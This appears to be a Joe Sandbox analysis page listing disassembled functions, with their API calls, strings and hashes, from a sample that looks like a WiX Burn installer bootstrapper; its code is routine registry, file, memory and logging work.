Function 009B8B17 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009D0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,009FAAA0,00000000,?,009D57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 009D0F80

RegCloseKey.ADVAPI32(00000000,00000000,00000088,00000000,000002C0,00000410,00020019,00000000,000002C0,00000000,?,?,?,009B8E57,00000000,00000000), ref: 009B8BD4

Strings

Failed to open uninstall key for potential related bundle: %ls, xrefs: 009B8B43
Failed to ensure there is space for related bundles., xrefs: 009B8B87
Failed to initialize package from related bundle id: %ls, xrefs: 009B8BBA

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseOpen
String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
API String ID: 47109696-1717420724
Opcode ID: 9d99fc3c84c393e77a51613cf042a129299c7a4abd5992b9b183a918e325ed95
Instruction ID: 8546f7217d4b2a62fac9b9d6aa076e5fad4e51f5c26996036433b45bfd4c5263
Opcode Fuzzy Hash: 9d99fc3c84c393e77a51613cf042a129299c7a4abd5992b9b183a918e325ed95
Instruction Fuzzy Hash: FC21A172940229FBDF129E94CE0AFEF7B6CEF48321F104059F900A6190DB719E60EB90

Function 00993B15 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,80004005,00000000,00000000,00000100,?,00991474,00000000,80004005,00000000,80004005,00000000,000001C7,?,009913B8), ref: 00993B33
HeapReAlloc.KERNEL32(00000000,?,00991474,00000000,80004005,00000000,80004005,00000000,000001C7,?,009913B8,000001C7,00000100,?,80004005,00000000), ref: 00993B3A

Part of subcall function 0099394F: GetProcessHeap.KERNEL32(?,000001C7,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993960
Part of subcall function 0099394F: RtlAllocateHeap.NTDLL(00000000,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993967

Part of subcall function 00993BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,009921CC,000001C7,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993BDB
Part of subcall function 00993BD3: HeapSize.KERNEL32(00000000,?,009921CC,000001C7,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993BE2

_memcpy_s.LIBCMT ref: 00993B86

Strings

memutil.cpp, xrefs: 00993BC7

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$Process$AllocAllocateSize_memcpy_s
String ID: memutil.cpp
API String ID: 3406509257-2429405624
Opcode ID: e72fc6384179b162d079193bd5be2eea8953b210d3f8ecccafdad177031563bd
Instruction ID: fbd60cb6c9d8d4da04dff2e66bb6e3d56a0a94fcfb65c71ac60aa9699d3cc12c
Opcode Fuzzy Hash: e72fc6384179b162d079193bd5be2eea8953b210d3f8ecccafdad177031563bd
Instruction Fuzzy Hash: 8C11B131605519AFDF226E6CCC48E7E3A5DEB80764B05C625FC149B262D735CF5096D0

Function 009D894D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70timeCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 009D8991
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009D89B9
GetLastError.KERNEL32 ref: 009D89C3

Strings

inetutil.cpp, xrefs: 009D89E4

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastTime$FileSystem
String ID: inetutil.cpp
API String ID: 1528435940-2900720265
Opcode ID: 1c8c752d0739fcaa6fada6231cb4d9b2e3834d3aa6958f1c4d213a07ceec26f1
Instruction ID: 3669a61ee07f93cec30d82f510c13b433238337f003535372ce2df8a62e5e954
Opcode Fuzzy Hash: 1c8c752d0739fcaa6fada6231cb4d9b2e3834d3aa6958f1c4d213a07ceec26f1
Instruction Fuzzy Hash: CB11E977A52139B7D7219BA9CC45BBFBBACAF44750F124116AE84F7201EA209D0097E2

Function 009A3AA6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009D0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,009FAAA0,00000000,?,009D57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 009D0F80

RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,009A3FB5,feclient.dll,?,00000000,?,?,?,00994B12), ref: 009A3B42

Part of subcall function 009D10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 009D112B
Part of subcall function 009D10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 009D1163

Strings

feclient.dll, xrefs: 009A3AAB
SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 009A3AB7
Logging, xrefs: 009A3AD4

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
API String ID: 1586453840-3596319545
Opcode ID: fef61cf5f448513d4d8ae4699e2cdfa36b1d25849a76cef3848aabd110353a8d
Instruction ID: e80e84622802f1f2fee6927c6c95e381431fec8b36926c4718d22b396b95db67
Opcode Fuzzy Hash: fef61cf5f448513d4d8ae4699e2cdfa36b1d25849a76cef3848aabd110353a8d
Instruction Fuzzy Hash: 2A11B632B40208BBDB21DB96DD86EBAB7BEEB52700F50C066F5009B151D6719F81D7A0

Function 009D0764 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63filestringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenA.KERNEL32(009B12CF,00000000,00000000,?,?,?,009D0013,009B12CF,009B12CF,?,00000000,0000FDE9,?,009B12CF,8007139F,Invalid operation for this state.), ref: 009D0776
WriteFile.KERNEL32(FFFFFFFF,00000000,00000000,?,00000000,?,?,009D0013,009B12CF,009B12CF,?,00000000,0000FDE9,?,009B12CF,8007139F), ref: 009D07B2
GetLastError.KERNEL32(?,?,009D0013,009B12CF,009B12CF,?,00000000,0000FDE9,?,009B12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 009D07BC

Strings

logutil.cpp, xrefs: 009D07ED

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastWritelstrlen
String ID: logutil.cpp
API String ID: 606256338-3545173039
Opcode ID: 3e2f4ffcbbc556732ab7dc0a516f8b63e9c3853bc9dfa26171fb8465c7e483ed
Instruction ID: 642a218b293a5171ee2ee6292927d41491a1cd2528383afaad078d1dedbd5267
Opcode Fuzzy Hash: 3e2f4ffcbbc556732ab7dc0a516f8b63e9c3853bc9dfa26171fb8465c7e483ed
Instruction Fuzzy Hash: 35117B72985129E787109A6ACD44FABBB6CEBC4760F118216FD05EB340D660ED00DAE0

Function 0099120A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,0099523F,00000000,?), ref: 00991248
GetLastError.KERNEL32(?,?,?,0099523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00991252

Strings

apputil.cpp, xrefs: 00991273
ignored , xrefs: 00991217

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ArgvCommandErrorLastLine
String ID: apputil.cpp$ignored
API String ID: 3459693003-568828354
Opcode ID: 03a4602b055856324bbeef3ad59c0f62b0c8c6b156370dcb203c1a431c72e4ee
Instruction ID: 66ad77f2df2ba4bf53a35b72b31d56bd27dde6559f0d823828637bec667fa1bc
Opcode Fuzzy Hash: 03a4602b055856324bbeef3ad59c0f62b0c8c6b156370dcb203c1a431c72e4ee
Instruction Fuzzy Hash: 55118F7694122AEB8F21EFDDD905D9EBBACBF44B50B024156FD14E7210EB309E00DAA0

Function 009BD1B3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00000002,00000000,?,?,009BD3EE,00000000,00000000,00000000,?), ref: 009BD1C3
ReleaseMutex.KERNEL32(?,?,009BD3EE,00000000,00000000,00000000,?), ref: 009BD24A

Part of subcall function 0099394F: GetProcessHeap.KERNEL32(?,000001C7,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993960
Part of subcall function 0099394F: RtlAllocateHeap.NTDLL(00000000,?,00992274,000001C7,00000001,80004005,8007139F,?,?,009D0267,8007139F,?,00000000,00000000,8007139F), ref: 00993967

Strings

Failed to allocate memory for message data, xrefs: 009BD212
NetFxChainer.cpp, xrefs: 009BD208

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
String ID: Failed to allocate memory for message data$NetFxChainer.cpp
API String ID: 2993511968-1624333943
Opcode ID: 2cad3804857012867adc4fafe620fb0ad5bba84048c20f2c7e9f3313212f4a3b
Instruction ID: fb9510bbb2651cb5adcc17e54d4687149e9b4ee3d991649fbca6ead2b029c210
Opcode Fuzzy Hash: 2cad3804857012867adc4fafe620fb0ad5bba84048c20f2c7e9f3313212f4a3b
Instruction Fuzzy Hash: 79118FB1201215EFCB159F68D885EA9B7F8FF89734B104169FA249B361C771A810CB94

Function 00991F69 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(0099428F,0099548E,?,00000000,00000000,00000000,?,80070656,?,?,?,009AE75C,00000000,0099548E,00000000,80070656), ref: 00991F9A
GetLastError.KERNEL32(?,?,?,009AE75C,00000000,0099548E,00000000,80070656,?,?,009A40BF,0099548E,?,80070656,00000001,crypt32.dll), ref: 00991FA7
LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,?,009AE75C,00000000,0099548E,00000000,80070656,?,?,009A40BF,0099548E), ref: 00991FEE

Strings

strutil.cpp, xrefs: 00991FCB

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID: strutil.cpp
API String ID: 1365068426-3612885251
Opcode ID: 99bcb47af758959a79fc6fd0110d8dd0ad025b9196698013021bbb24375b9db0
Instruction ID: 6bfc4f17526de21136186c307911ebe0980a6563d990ccd28459e64ba7f4b2df
Opcode Fuzzy Hash: 99bcb47af758959a79fc6fd0110d8dd0ad025b9196698013021bbb24375b9db0
Instruction Fuzzy Hash: DC01A1B695112EFBDF208F99DC09ADEBBACEB08750F014166BD04F7210E7309E009AE0

Function 009A0721 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009D0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,009FAAA0,00000000,?,009D57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 009D0F80

RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,00000001,00000000), ref: 009A0791

Strings

Failed to open registration key., xrefs: 009A0748
Failed to update name and publisher., xrefs: 009A077B
Failed to update resume mode., xrefs: 009A0762

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseOpen
String ID: Failed to open registration key.$Failed to update name and publisher.$Failed to update resume mode.
API String ID: 47109696-1865096027
Opcode ID: 30c0a26f7306ec4ac3b32a7d7e44a4f0340d4be3178585ec95bf6692ec53eca6
Instruction ID: a5d4fb5f4f5c85b7154abb967c86c448c50d1e20042ade1fc5d9bd7edd1ca8c0
Opcode Fuzzy Hash: 30c0a26f7306ec4ac3b32a7d7e44a4f0340d4be3178585ec95bf6692ec53eca6
Instruction Fuzzy Hash: F501A732A81628FBCF235A95DC42FAEBB79AF81B60F104155F900B6250D775BE50ABD0

Function 009D4DB3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(009DB500,40000000,00000001,00000000,00000002,00000080,00000000,009A04BF,00000000,?,0099F4F4,?,00000080,009DB500,00000000), ref: 009D4DCB
GetLastError.KERNEL32(?,0099F4F4,?,00000080,009DB500,00000000,?,009A04BF,?,00000094,?,?,?,?,?,00000000), ref: 009D4DD8
CloseHandle.KERNEL32(00000000,00000000,?,0099F4F4,?,0099F4F4,?,00000080,009DB500,00000000,?,009A04BF,?,00000094), ref: 009D4E2C

Strings

fileutil.cpp, xrefs: 009D4DFC

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: fileutil.cpp
API String ID: 2528220319-2967768451
Opcode ID: f14142632e778ab24e1dff3bb4b8c471ee392e5b405548d481fe826b28566b2d
Instruction ID: b1852f41e5f2ae18f03028553abd3e418e46b86e0bef93708b3c5fc9771bf93c
Opcode Fuzzy Hash: f14142632e778ab24e1dff3bb4b8c471ee392e5b405548d481fe826b28566b2d
Instruction Fuzzy Hash: 340184336C1125B7D7225AA99C09F5F3B59AB81B71F168312FF20AB2D0D7709C5196E0

Function 009D497A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,000002C0,00000000,?,009B8C76,00000000,00000088,000002C0,BundleCachePath,00000000), ref: 009D49AE
GetLastError.KERNEL32(?,009B8C76,00000000,00000088,000002C0,BundleCachePath,00000000,000002C0,BundleVersion,000000B8,000002C0,EngineVersion,000002C0,000000B0), ref: 009D49BB

Strings

fileutil.cpp, xrefs: 009D498F, 009D49DF

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: CreateErrorFileLast
String ID: fileutil.cpp
API String ID: 1214770103-2967768451
Opcode ID: 416ad3c28b1428f6cab63a1f175e978d3d1cd4377567911e00cb3bd6e59e1ff3
Instruction ID: f4bad2f94fcda94430853c841b33f5e2e38a5337fecde1d2446061e4f963542c
Opcode Fuzzy Hash: 416ad3c28b1428f6cab63a1f175e978d3d1cd4377567911e00cb3bd6e59e1ff3
Instruction Fuzzy Hash: 8401D6336C1238B7D72126979C1AF7B265CAB40FA0F12C223FF55AA2C0C7754D4052E0

Function 009B6BEB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49serviceCOMMON

Download Yara Rule

APIs

ControlService.ADVAPI32(009B6AFD,00000001,?,00000001,00000000,?,?,?,?,?,?,009B6AFD,00000000), ref: 009B6C13
GetLastError.KERNEL32(?,?,?,?,?,?,009B6AFD,00000000), ref: 009B6C1D

Strings

Failed to stop wusa service., xrefs: 009B6C4B
msuengine.cpp, xrefs: 009B6C41

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ControlErrorLastService
String ID: Failed to stop wusa service.$msuengine.cpp
API String ID: 4114567744-2259829683
Opcode ID: be24088281aa27d3d5e65431601a12ddbd91daf201887924dadbfaa6a931c8d0
Instruction ID: 73bb6445da936f011feaefad231348c3993c079a29891f9c32192def32dcf31c
Opcode Fuzzy Hash: be24088281aa27d3d5e65431601a12ddbd91daf201887924dadbfaa6a931c8d0
Instruction Fuzzy Hash: DC01D073A4523867DB209BA59D06BEF7BA8DB48B30F014129FE44BB180DA349D0195E4

Function 009D39AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 009D39F4
SysFreeString.OLEAUT32(00000000), ref: 009D3A27

Strings

`5w, xrefs: 009D3A27
xmlutil.cpp, xrefs: 009D39C5, 009D3A0B

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: String$AllocFree
String ID: `5w$xmlutil.cpp
API String ID: 344208780-26783885
Opcode ID: b965675de5b788f6bb95aecfc26ba8816c60c558476752f86ff380940b51a40a
Instruction ID: e46cb3e6dbd3145bff0900619d05d0e2507afccf953e6c0cd84b4bcba3d221b0
Opcode Fuzzy Hash: b965675de5b788f6bb95aecfc26ba8816c60c558476752f86ff380940b51a40a
Instruction Fuzzy Hash: A8018F35685215E7DB205A9A9C09E7B76DCDF81BA5B11C426B844A7340C6A4CE009692

Function 009D3929 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 009D396E
SysFreeString.OLEAUT32(00000000), ref: 009D39A1

Strings

`5w, xrefs: 009D39A1
xmlutil.cpp, xrefs: 009D393F, 009D3985

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: String$AllocFree
String ID: `5w$xmlutil.cpp
API String ID: 344208780-26783885
Opcode ID: 267b3642e445c3cd99be4e39aad17bbbcdfcafe6e0e81026807a8f5d5a57157a
Instruction ID: 285f35aaf17fa22150311f15c11dca8f96a1abebd9da1d18bba7a96968cdec78
Opcode Fuzzy Hash: 267b3642e445c3cd99be4e39aad17bbbcdfcafe6e0e81026807a8f5d5a57157a
Instruction Fuzzy Hash: AE01A23528931AEBDB201A998C04F7B77DCAF81BA5F11C536FD44E7340C6B4CD009692

Function 009D68B0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 009D690F

Part of subcall function 009D8713: SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 009D8820
Part of subcall function 009D8713: GetLastError.KERNEL32 ref: 009D882A

Strings

`5w, xrefs: 009D690F
clbcatq.dll, xrefs: 009D68DC
atomutil.cpp, xrefs: 009D68FD

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: Time$ErrorFileFreeLastStringSystem
String ID: `5w$atomutil.cpp$clbcatq.dll
API String ID: 211557998-3684314812
Opcode ID: a1d45103fa19cb2da543344f138c0445b1ad39573351c1f0792253feb119bdaf
Instruction ID: abb16adff56b7bda419b9c308d6602b82b7acd1dc7b8443404c6f613e0a1d9f2
Opcode Fuzzy Hash: a1d45103fa19cb2da543344f138c0445b1ad39573351c1f0792253feb119bdaf
Instruction Fuzzy Hash: 2601ADB198122AFB8F209F89C94186AFBA8EB54365B60C17BF504A7310C3319E10E7D0

Function 009AECC5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009002,00000000,?), ref: 009AECED
GetLastError.KERNEL32 ref: 009AECF7

Strings

Failed to post elevate message., xrefs: 009AED25
EngineForApplication.cpp, xrefs: 009AED1B

Memory Dump Source

Source File: 00000001.00000002.1637603020.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000001.00000002.1637579312.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637634280.00000000009DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637659717.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1637682820.00000000009FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post elevate message.
API String ID: 2609174426-4098423239
Opcode ID: f883bb4e0c3a4bbd7d9ac0813f1568db3acbe8b428b46c698aa383fb361ac64e
Instruction ID: dc8f2d1243bd76bddaa539d73cc4320b5f766158ed1df28f07196036cd2b023e
Opcode Fuzzy Hash: f883bb4e0c3a4bbd7d9ac0813f1568db3acbe8b428b46c698aa383fb361ac64e
Instruction Fuzzy Hash: D1F02B33A81235ABC7215A9D9C09B467798BF45B74B228629FF24AF2D1E725DC0193D0

Function 0099D8DC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 0099D903
FreeLibrary.KERNEL32(?,?,009948D7,00000000,?,?,0099548E,?,?), ref: 0099D912
GetLastError.KERNEL32(?,009948D7,00000000,?,?,0099548E,?,?), ref: 0099D91C

Strings

